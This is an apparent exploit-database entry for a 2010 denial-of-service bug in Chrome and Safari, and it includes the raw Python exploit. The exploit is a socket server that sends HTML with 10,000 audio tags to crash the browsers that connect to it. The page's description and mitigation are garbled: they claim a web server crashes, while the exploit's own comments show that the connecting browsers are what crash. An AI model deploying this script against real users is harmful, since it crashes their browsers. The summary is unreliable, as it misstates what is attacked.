Multiple Browsers Audio Tag DoS Vulnerability

vendor:

Chrome

by:

Chase Higgins

7,5

CVSS

HIGH

Denial of Service

CWE

Product Name: Chrome

Affected Version From: Google Chrome 5.0.375.9 dev

Affected Version To: Google Chrome 5.0.375.9 dev

Patch Exists: NO

Related CWE: N/A

CPE: a:google:chrome

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mac OSX 10.5.8

2010

Multiple Browsers Audio Tag DoS Vulnerability

This vulnerability allows an attacker to cause a denial of service (DoS) by sending a specially crafted ogg file to a vulnerable web server. The server will then crash due to the large number of audio tags in the HTML code. The crash reporter for Mac OSX 10.5.8 seems to think this is a EXEC_BAD_ACCESS.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the web server is not vulnerable to this attack by limiting the number of audio tags that can be included in a single HTML page.

Source

Exploit-DB raw data:

#!/usr/bin/python

#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients

# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
 
import sys, socket;

def main():
	html = """
	<html>
	<body>
	""";
	
	html += "<audio src='myogg.ogg'>" * 10000;
	
	html += """
	</body>
	</html>
	""";
	
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
	s.bind(('', 2121));
	s.listen(1);
	
	while True:
		channel, details = s.accept();
		print channel.recv(256);
		channel.send(html);
		channel.close();
	
main();